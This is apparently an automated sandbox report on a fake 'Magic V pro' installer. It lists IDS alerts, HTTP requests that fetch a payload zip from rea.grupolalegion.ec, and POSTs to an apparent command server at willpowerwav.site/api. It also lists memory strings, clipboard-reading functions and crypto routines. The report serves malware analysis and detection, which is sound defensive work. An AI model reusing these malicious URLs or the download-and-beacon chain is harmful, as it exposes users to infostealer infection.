Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49729 -> 172.67.194.165:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 172.67.194.165:443

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /y7yju2tp HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: tinyurl.com
Source: global traffic	HTTP traffic detected: GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: rentry.org
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /y7yju2tp HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: tinyurl.com
Source: global traffic	HTTP traffic detected: GET /cc3ba8b679c926fc9911aede9009e589cbd3667c48439c630418d27fdbb52fc8/raw HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)rentry-auth: e9700e0e5dfc56e362dbe75fHost: rentry.org
Source: global traffic	HTTP traffic detected: GET /willrandom.zip HTTP/1.1Accept: /User-Agent: InnoDownloadPlugin/1.5Host: rea.grupolalegion.ecConnection: Keep-AliveCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: tinyurl.com
Source: global traffic	DNS traffic detected: DNS query: rentry.org
Source: global traffic	DNS traffic detected: DNS query: rea.grupolalegion.ec
Source: global traffic	DNS traffic detected: DNS query: willpowerwav.site

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: willpowerwav.site

Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Mar 2025 02:14:49 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: SAMEORIGINReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SJDNiZqPAS9JO10fMDiJ1YvHzS%2BxpmNuK5YO%2BsqbQPiKtTI%2Fgaci1NimzvulzcPDdkPxBFTeqjFJPKWJgz1auCndpQ2opPw8akM4i96k%2Bk0MJLD0pzxdtJ4m2gFvy3%2FDjsjGaw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 91ced241b80f9035-BOS
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 08 Mar 2025 02:15:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeServer: cloudflareCF-RAY: 91ced38809a78f8d-BOS

Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1236181676.000000007F3D0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1/innosetup/index.htm
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr	String found in binary or memory: http://bitbucket.org/mitrich_k/inno-download-plugin
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240754645.000000007F520000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1237949116.000000007F4C0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1365963683.000000007E170000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1355623818.000000007D840000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://jrsoftware.github.io/issrc/ISHelper/isxfunc.xml
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1240210545.0000000003610000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000002.1254642443.000000000018F000.00000004.00000010.00020000.00000000.sdmp, idp.dll.1.dr, idp.dll.4.dr	String found in binary or memory: http://mitrichsoftware.wordpress.comB
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.0000000002482000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://schemas.microsoft.coa7H
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gsgccr45evcodesignca2020.crt0?
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	String found in binary or memory: http://www.freepdfeditor.net
Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	String found in binary or memory: http://www.freepdfeditor.netj
Source: taskshostw.exe, 00000011.00000000.1406495324.0000000000401000.00000020.00000001.01000000.00000010.sdmp, taskshostw.exe, 00000011.00000003.1471284343.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, willrandom.exe.10.dr	String found in binary or memory: http://www.freepdfeditor.netopenU
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	String found in binary or memory: http://www.innosetup.com/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000003.00000003.1453721155.0000000002241000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.org0
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1262551658.00000000022DC000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1187273002.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1192524909.00000000033F0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.0000000002489000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.orgAbout
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000003.1250554977.000000000246D000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1443446001.000000000240D000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.kymoto.orgq
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co(
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188417484.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.exe, 00000000.00000003.1188850208.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000001.00000000.1190034354.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.0.dr, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp.3.dr	String found in binary or memory: http://www.remobjects.com/ps
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.000000000097F000.00000004.00000020.00020000.00000000.sdmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.000000000097C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/R
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1421929567.00000000075F8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zip
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipU
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1417406355.0000000003F35000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipWW
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://rea.grupolalegion.ec/willrandom.zipq
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000003.1445564914.0000000000922000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/1
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.tmp, 00000004.00000002.1448967985.00000000008A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tinyurl.com/l
Source: taskshostw.exe, 00000011.00000002.1517647139.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.000000000070A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1498087630.0000000000710000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000070B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000866000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/
Source: taskshostw.exe, 00000011.00000003.1514392072.000000000075A000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/:
Source: taskshostw.exe, 00000016.00000003.2019868052.0000000000824000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000827000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/Y
Source: taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000876000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/api
Source: taskshostw.exe, 00000016.00000002.2039469356.00000000007D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/apiF
Source: taskshostw.exe, 00000011.00000003.1514392072.000000000075E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.000000000075C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site/apix
Source: taskshostw.exe, 00000016.00000003.2037241269.000000000083C000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000002.2039954771.0000000000840000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://willpowerwav.site:443/api
Source: taskshostw.exe, 00000011.00000003.1514392072.0000000000702000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497071497.0000000000786000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019868052.000000000081E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: taskshostw.exe, 00000011.00000003.1514392072.0000000000746000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1497163107.0000000000741000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000002.1517836410.0000000000784000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000011.00000003.1514392072.0000000000783000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019097864.000000000088E000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.0000000000852000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.000000000083D000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2037241269.000000000088B000.00000004.00000020.00020000.00000000.sdmp, taskshostw.exe, 00000016.00000003.2019166935.0000000000858000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
Source: Magic_V_pro_setup_stable_latest_release_version_9_709.exe	String found in binary or memory: https://www.globalsign.com/repository/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724

Uses secure TLS version for HTTPS connections

Source: unknown	HTTPS traffic detected: 104.18.111.161:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 190.92.154.206:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.194.165:443 -> 192.168.2.4:49729 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality for read data from the clipboard

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 17_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

17_2_0043AF10

Contains functionality to read the clipboard data

Source: C:\Users\user\AppData\Local\Programs\Common\taskshostw.exe

Code function: 17_2_0043AF10 OpenClipboard,GetClipboardData,GlobalLock,GetWindowRect,GlobalUnlock,CloseClipboard,

17_2_0043AF10

System Summary

Drops password protected ZIP file

Source: logs.4.dr

Zip Entry: encrypted

Contains functionality to communicate with device drivers

Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe

Code function: 10_2_00FF8752: __EH_prolog,GetFileInformationByHandle,DeviceIoControl,memcpy,

10_2_00FF8752

Detected potential crypto function

Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_3_00927D93	4_3_00927D93
Source: C:\Users\user\AppData\Local\Temp\is-Q5OPF.tmp\Magic_V_pro_setup_stable_latest_release_version_9_709.tmp	Code function: 4_3_0092DF71	4_3_0092DF71
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0105CD3B	10_2_0105CD3B
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01056D56	10_2_01056D56
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106ADF0	10_2_0106ADF0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01088110	10_2_01088110
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01084170	10_2_01084170
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01074020	10_2_01074020
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01074270	10_2_01074270
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010602BA	10_2_010602BA
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010802C0	10_2_010802C0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0104C50E	10_2_0104C50E
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106C530	10_2_0106C530
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0100C5E6	10_2_0100C5E6
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0100C417	10_2_0100C417
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0108C410	10_2_0108C410
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01068630	10_2_01068630
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01074660	10_2_01074660
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01094910	10_2_01094910
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01078930	10_2_01078930
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01078830	10_2_01078830
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01090B90	10_2_01090B90
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01098BE0	10_2_01098BE0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01098A20	10_2_01098A20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01094AE9	10_2_01094AE9
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01038C03	10_2_01038C03
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01090FB0	10_2_01090FB0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106D010	10_2_0106D010
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01071310	10_2_01071310
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01069370	10_2_01069370
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_00FF1598	10_2_00FF1598
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01045775	10_2_01045775
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01079690	10_2_01079690
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010656A0	10_2_010656A0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_00FF5A88	10_2_00FF5A88
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_00FF1A67	10_2_00FF1A67
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01071A20	10_2_01071A20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01039A5D	10_2_01039A5D
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01079A80	10_2_01079A80
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_00FF9C00	10_2_00FF9C00
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01091CF0	10_2_01091CF0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01081FC0	10_2_01081FC0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01089E20	10_2_01089E20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01049E89	10_2_01049E89
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0100A11A	10_2_0100A11A
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01086150	10_2_01086150
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01066180	10_2_01066180
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01082040	10_2_01082040
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_010720F0	10_2_010720F0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0104237F	10_2_0104237F
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0108A3E0	10_2_0108A3E0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106A590	10_2_0106A590
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0107A4A0	10_2_0107A4A0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0107A750	10_2_0107A750
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01092900	10_2_01092900
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0100E991	10_2_0100E991
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106E860	10_2_0106E860
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0107A8B0	10_2_0107A8B0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01052B00	10_2_01052B00
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01092AB0	10_2_01092AB0
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0103ECF6	10_2_0103ECF6
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0108AF20	10_2_0108AF20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0107AE20	10_2_0107AE20
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_01093020	10_2_01093020
Source: C:\Users\user\AppData\Local\Temp\is-R3SKQ.tmp\idp.exe	Code function: 10_2_0106F0D0	10_2_0106F0D0
